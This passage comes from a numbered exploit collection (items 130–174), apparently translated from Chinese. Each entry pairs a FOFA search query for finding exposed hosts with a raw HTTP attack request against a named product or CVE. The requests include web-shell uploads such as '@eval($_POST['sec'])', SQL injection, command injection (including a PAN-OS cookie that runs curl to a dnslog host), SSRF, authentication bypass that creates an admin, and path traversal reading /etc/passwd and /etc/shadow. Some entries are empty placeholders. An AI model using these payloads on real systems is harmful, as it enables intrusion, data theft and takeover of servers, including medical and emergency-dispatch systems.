User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request the /config file to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 1062
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. Meite (美特) CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. INFINITT (英飞达) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. Keytop (科拓) fully intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. Haoka Jituan (号卡极团) distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. Huixiaoyuan/Anxiaoyi (慧校园/安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. Lean Value Management System (精益价值管理系统) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing (宏景) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. Hongjing (宏景) EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. Tongtianxing (通天星) CMSV6 vehicle GPS monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. Jinhe (金和) OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
